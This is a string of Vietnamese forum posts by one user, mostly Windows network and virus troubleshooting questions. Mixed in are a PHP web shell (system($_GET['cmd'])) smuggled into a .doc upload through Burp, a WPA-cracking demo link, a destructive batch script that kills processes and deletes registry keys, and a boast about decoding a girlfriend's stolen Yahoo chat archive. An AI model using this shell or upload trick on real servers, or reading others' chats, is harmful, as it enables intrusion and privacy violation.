Messages posted by: woodenhouse

cái đó là một cái hình mà bạn ... người ta vẽ hình chèn vào nên nó mềm mại vậy đó
link hình button đó http://www.moinhat.com/shop/images/button_04_3.jpg

khi coi code chú ý cái dòng background= cái đó là chèn hình vào đó bạn à
<td width="211" height="31" align="center" valign="top" background="images/button_04_3.jpg">

daigiaIQ_Y2.1K wrote:

Tắt cái nay thì drivers không chạy là cái chắc

tắt trong msconfig chạy ok ko ảnh hưởng gì đâu bạn... mình đã test trên nhiều máy ko hề bị gì hết ....

cái con này BKAV diệt được nàh ... tải bkav bảng mới nhất vào safe mode diệt

Em ko biết Em làm đúng ko sao mà ko dc hix ... anh tmd coi giùm em với hix .. tiếng anh của em có hạn nên hix ... Em làm như sau :
1) Vào trong service.msc > Protected Storage service chỉnh Automatic.

2) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
DWORD DisableDomainCreds = 1

3) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
tạo 1 key mới nằm dưới Policies là Network > DWORD "DisablePwdCaching" = 0
Lúc đầu trong bước số 3 này em ko có cái key là Network nhưng đọc tới cuối trang thấy anh đó tạo nên em tạo theo nhưng vẫn ko dc hix ... em thử xóa ko giữ cái key này cũng ko dc luôn. ko biết bị gì luôn huhu. anh còn cách nào nữa ko giúp em với

hix ... vậy thua hả anh? e đã check thử trong phần service thì cái service "Protected Storage" đã được start. Em cũng kiểm tra trong msconfig thì cũng thấy cái service này start lúc khởi động WIn .... hix ... vậy giớ có cách nào giải quyết ko a? a cho e 1 lời khuyên nữa được ko a? còn vụ registry gì đó e chưa hiểu rõ lắm hix ... ko biết kt ra sao luôn hix ...
thiệt tình em xem ko được cái solution ... trong mỗi cái khung đó nó đều ghi 1 dòng là all comment is available to Preminum memebers ... hix

Hiện tại cty yêu cầu khi phát hiện 1 user trong mạng online = 1 trong những phần mềm sau thì phải ghi log và cảnh báo:
# YIM
# AIM
# MSN
# ICQ
# Skype
# Gtalk
em mới khảo sát thì biết được có phần mềm Wireshark and Ethereal có thể sniff được tất cả các gói tin trong mạng nội bộ ... và e thấy trong phần mềm này có phần filter ... nhưng vẫn chưa hiểu rõ phần này ... vậy ai có tài liệu về phần filter này cho em xin với ... vì E nghỉ là mình sẽ filter những gói tin bắt được khi truy cập vào ip của các IM chat trên từ đó mình biết được máy nào đang chat ... Em có các câu hỏi sau:
1) Theo các anh có khả thi ko ạ?
2) ai có list IP của các IM chat trên ko cho em xin với ạ.. e chỉ biết mỗi yahoo hình như là 68.142.194.14 vì e ping cái domain messenger.yahoo.com thì ra ip này hihihi ...
3) nếu có cách nào hay hơn thì chỉ e luôn ạ thanks nhiều nhiều ....

Anh chép giùm em cái solution được ko? em ko đăng ký trang đó được nên ko tài nào coi cách người ta chỉ giải quyết ra sao hix ...

Anh hiểu ý e rồi đó ... chính xác là cái list user đó nó bị mất mỗi khi restar máy hix ... e ko biết lý do vì sao luôn ... e ko chỉnh group policy gì hết hix ... toàn bộ đều ok .... nhưng ko biết lý do vì sao khi restart là cái list trong "control userpasswords2 " mất sạch hix ...

hix... server do em quản lý luôn sao mà chỉnh được ... hix... nếu có chỉnh thì nó là phần nào dạ a? vì hình như ko có phần nào liên quan đến việc yêu cầu mỗi lần user đăng nhập thì phải đánh pass cả ... với lại nếu có chỉnh thì làm sao 35 máy con còn lại ko bị ... mà chỉ bị 5 máy kia .. lúc trc chỉ 1 máy bị xong giờ tăng lên là 5 máy hix ...

dạ e xin lỗi tại em nghỉ .... là cho a nghỉ mệt tí dài hơn dấu chấm mà hihihi

@tmd chắc anh chưa hiểu em nữa rùi em xin giải thích rõ luôn như sau nha:
1 mô hình mạng cty e là ngang hàng workgroup... có 1 winserver 2003 và 40 máy con sài XP SP2 ... trên winserver 2003 em tạo 40 user để mỗi máy con sẽ vào server dùng pas và user khác nhau ... khi 1 máy con muốn vào server thì máy con sẽ vào run đánh vào \\server1\share lúc đó sẽ có 1 cái bảng hiện user và pass ... nhập xong em có check luôn dấu remember để giúp cho máy con nhớ lại cái pass và user khi lần sau truy cập server nó sẽ ko hỏi nữa ... nhưng giờ máy con bị hiện tượng sau : khi restart lại windows của máy con thì khi truy cập server bằng cách \\server1\share nó hiện bảng username và pass đòi nhập vào mặc dù trước lúc restart máy em có đăng nhập server và đánh dấu check rememeber rồi .... nhưng cứ restart lại máy là khi vào server nó đều hỏi ... trước đây 4 máy con này dùng bình thường ko hề bị hiện tượng này .... hix... hiện tượng chỉ bị khi restart còn nếu logoff thì ko bị .... em cũng tạo thử 1 user khác trên máy con ... xong đăng nhập vào máy con đó dùng user khác này và vào server dùng \\server1\share xong check remember rồi restart lại máy con vào lại server thì ko hề bị ... chứng tỏ bên user kia đang bị lỗi mà em ko biết lỗi gì luôn hix....

hix hôm nay lại bị thêm 1 máy là có 5 máy con bên e bị bịnh này ... e nghi virus quá vì tự nhiên giờ nó tăng số máy bị lên hix ... mong các anh giúp đỡ gấp gấp hixx

Nghĩa là mạng nội bộ của em có 40 máy con ... giờ có 4 máy bị hiện tượng như trên... khi muốn truy cập vào server để chép dữ liệu (sẽ đánh \\server1\share trong ô "Run" của Windows) thì phải nhập pass và user đúng ko ạ? và em chắc chắn 100% là e có đánh dấu check vào ô Remember password... nhưng khi restart máy thì khi truy cập lại server nó lại hiện cái khung hỏi username và pass... chỉ restart mới bị còn đứng ngay máy đó log off xong logon vào user đó xong truy cập vào server thì ko bị ... hix ... 4 máy này lúc trước sài bình thường nhưng khi hiểu sao nó mới bị cách đây 2 ngày thôi .... em check rùi máy ko sài chương trình đóng băng hix ... ko lẻ hư win ta ... vô lý quá ... đã gỡ BKAV và NOD32 sài KAV quét ko thấy virus luôn

Máy em bị hiện tượng như sau: khi logon server bằng cách đánh \\server1\share thì hiện ra khung nhập password và username ... khi em nhập xong có đánh dấu check vào remember nhưng khi restart máy thì khi vào lại server nó lại hỏi lại username và password ... em kiểm tra như sau: vào trong control panel chọn User Accounts > click chọn user mình hay dùng để logon vào win > trong menu bên trái chọn Manage my network passwords trong khung hiện ra đáng lẽ nó phải hiện cái list các username và password mà mình đã nhập vào server ... nhưng khi restart máy thì cái list đó mất sạch hix ... ko biết máy em bị gì ... lúc trước chỉ có 1 máy bị bây giờ mạng nội bộ của mình đã có 3 máy bị hiện tượng như vầy rồi hix ...
Mong các anh giúp giùm em vụ này ...
Máy hiện tại đang sài BKAV và NOD32

trên dòng desktop thì ko thấy gì còn laptop em thấy dạo này mấy con Nvidia hay bị lỗi nóng chip dẫn đến tình trạng máy bị đơ ... còn dòng ATI thì chưa thấy hihi ...

Em đang thực hành vụ này mấy a cho em hỏi như sau:
trên server em thực hành thì nó chỉ cho upload file dạng đuôi .doc ... em dùng burpsuite_v1.2 chặn lại được para rồi em sữa khúc sau:

-----------------------------7d92ce23906f2
Content-Disposition: form-data; name="spec"; filename="C:\Documents and Settings\User\Desktop\test.doc"
Content-Type: application/msword

<?
system($_GET['cmd']);
?>
-----------------------------7d92ce23906f2
Content-Disposition: form-data; name="specFileName"

test.doc

-----------
em đã thêm dòng <?system($_GET['cmd']);?> rồi forward đi forward thành công luôn nhưng khi bật 1 khung IE khác em gõ http://website/upload/test.doc?cmd=netstat -an thì trang web nó hiện lên khung download file .doc này chứ ko thực thi đoạn lệnh system kia vậy em bị sai ở đâu dạ? các giúp em với ạ ... em cũng download file .doc này về và mở dạng code ra coi thử thì có dòng <?system($_GET['cmd']);?> nhưng ko biết tại sao nó ko chạy được hix

Em đang sài bản win2k3 ... khi em vào chế độ safe mode = F8 ... đến màn hình đăng nhập vừa nhập username và password xong nhấn enter là bị restart ngay ... máy có báo cái gì temporary file gì đó đọc ko kịp hix ....có anh nào bị lỗi này ko ạ giúp em với ... còn vào chế độ bình thường cứ đến màn hình logon mà em ko đánh user và pass để login thì đúng 5 phút sau máy cũng restart hix ... ko biết máy em bị dính virus gì luôn ...
Em đang sài BKAV kết hợp NOD32 quét ko thấy gì hết ...
em đã scan = hjack và link down đây ạ
Code:

http://ifile.it/4qbw8h9

Server của em bị nhiễm virus gì đó ko biết hix... khi boot vào dạng safe mode thì vừa nhập pass và username để vào win là máy tự khởi động lại ngay ... còn đăng nhập vào win = chế độ bình thường thì được hix ... có anh nào bị giống em ko chỉ em với ạ...

toàn bộ máy tính trong cty em giờ máy nào cũng dính con này vừa khởi động vào tới Window là Symantec nó nhảy hiện bảng thông báo dính con này và quét được từ trong "C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5" em đã vào từng máy xóa sạch thư mục này nhưng đến ngày mai khởi động lại win nó lại hiện lại ... vậy làm sao diệt triệt để con này có anh giúp em với ạ. .....

link khác nèh bạn ơi
Code:

http://www.mediafire.com/download.php?znf25zdztyd

đây là phần mềm cũa bạn nèh .... cài vào rồi trỏ file dat chôm dc của bạn gái rùi ...hix... đọc xong té ngữa vì biết bạn gái mình ko có hiền lành ...hú hú .....bùn ghia ghia....hix...

Super Yahoo Messenger Archive Decoder
http://www.box.net/shared/gz8ftgzk0k

có anh nào đi học quay phim chụp hình thu âm post lên mọi người học theo với huhuhu...nhiều người ở xa quá sao ghé học dc...hix... như a @K4i ko lẻ bỏ 2mb vào xì gòn học .... hix... người muốn học thì ko có laptop hix....căng thiệt

K4i wrote:

Sửa lại một chút cho bác StarGhost:

Cái WPA sử dụng AES làm thuật toán mã hóa chính là WPA2 mà mọi người hay đề cập đến. Hiện tại thì khá nhiều con Access Point support cả 2 loại WPA và WPA2. Bạn nên kiểm tra lại trong con Access Point của mình. Hiện tại theo khuyến cáo là nên ngay lập tức chuyển sang sử dụng WPA2 với AES.

Chờ mãi chưa thấy demo đâu.

dạ trong modem em nó có cho chọn 3 dạng là WEP, WPA, WPA-PSK ....vậy nên chọn chuẫn nào là ok nhất ạ?....em vẫn chưa hiểu làm sao chọn dc WPA2 với AES ....vì em tìm hoài vẫn ko thấy cái WPA TKIP hay WPA với AES....hix

link demo crack WPA:
demo hack WPA với Backtrack3
password :khiemkp
Code:

http://rapidshare.com/files/162621317/WPA_Cracking_using_Aireplay_v2.2_Beta_7.rar

StarGhost wrote:

Cái này hình như mới break được WPA dùng TKIP thôi, tức là vấn đề nằm ở TKIP chứ không phải WPA. Vẫn còn option dùng AES mà thực ra là an toàn hơn nhiều, hiện tại mới miễn cưỡng break được 7 rounds thôi, còn ít nhất 3 rounds nữa. Mọi người cứ yên tâm dùng AES, vì có thể extend đến 256 bits.

anh ơi có thể nói rõ hơn là TKIP và AES khác nhau ra sao ko ạ? làm sao biết WPA mình đang sài là dạng TKIP hay AES ko ạ? em cám ơn anh ạ

dạ ko sao ạ...tại e test thử code của anh....mà sao chạy xong thấy tạo autorun.inf tùm lum tưởng bị dính virus....nhưng ý nghĩa của nó hoạt động ra sao mà ko bị dính virus dạ a? anh giải thích 1 tí dc ko ạ?...
à tại em cũng đang ngâm cứu coi làm sao biết máy đang nhiễm virus hay ko......hihi.....

@kamikazeq
sau khi chạy cái end all task.bat có nội dung là
Code:

taskkill /f /fi "imagename ne cmd.exe" /fi "username eq %username%"
taskkill /f /fi "imagename ne cmd.exe" /fi "username eq %username%"
Del /Q /F /A s c:\autorun*
Del /Q /F /A s d:\autorun*
Del /Q /F /A s e:\autorun*
Del /Q /F /A s f:\autorun*
Del /Q /F /A s g:\autorun*
Del /Q /F /A s h:\autorun*
Del /Q /F /A s i:\autorun*
Del /Q /F /A s j:\autorun*
Del /Q /F /A s k:\autorun*
Del /Q /F /A s l:\autorun*
Del /Q /F /A s m:\autorun*
Del /Q /F /A s n:\autorun*
Del /Q /F /A s o:\autorun*
Del /Q /F /A s p:\autorun*
Del /Q /F /A s q:\autorun*
Del /Q /F /A s r:\autorun*
Del /Q /F /A s s:\autorun*
Del /Q /F /A s t:\autorun*
Del /Q /F /A s u:\autorun*
Del /Q /F /A s v:\autorun*
Del /Q /F /A s w:\autorun*
Del /Q /F /A s x:\autorun*
Del /Q /F /A s y:\autorun*
Del /Q /F /A s z:\autorun*
MD c:\autorun.inf\.......\
MD d:\autorun.inf\.......\
MD e:\autorun.inf\.......\
MD f:\autorun.inf\.......\
MD g:\autorun.inf\.......\
MD h:\autorun.inf\.......\
MD i:\autorun.inf\.......\
MD j:\autorun.inf\.......\
MD k:\autorun.inf\.......\
MD l:\autorun.inf\.......\
MD m:\autorun.inf\.......\
MD n:\autorun.inf\.......\
MD o:\autorun.inf\.......\
MD p:\autorun.inf\.......\
MD q:\autorun.inf\.......\
MD r:\autorun.inf\.......\
MD s:\autorun.inf\.......\
MD t:\autorun.inf\.......\
MD u:\autorun.inf\.......\
MD v:\autorun.inf\.......\
MD w:\autorun.inf\.......\
MD x:\autorun.inf\.......\
MD y:\autorun.inf\.......\
MD z:\autorun.inf\.......\
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d Explorer.exe /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\WINDOWS\system32\userinit.exe, /F
explorer

thì trên tất cả các ổ cứng của em đều có thư mục tên autorun.inf trong đó có thư mục con là "....." vậy cho em hỏi cái này có phải virus ko? và ý nghĩa của những thư mục này để làm gì ạ?.....sao em xóa nó đi ko dc luôn????

1) có anh nào chỉ giùm em cách chống sniffer hiệu quả ko ạ?
em thì gán địa chỉ MAC static vào máy e...nhưng giờ nhiều máy quá em ko thể đi gán từng máy một dc...lâu lâu bị rớt mạng cũng phải đi gán lại....
2)với lại có anh nào có phần mềm nào detect được máy nào đang sniffer sẽ cảnh báo gữi mail chẳn hạn ngay lúc đó có máy đang sniffer
cám ơn các anh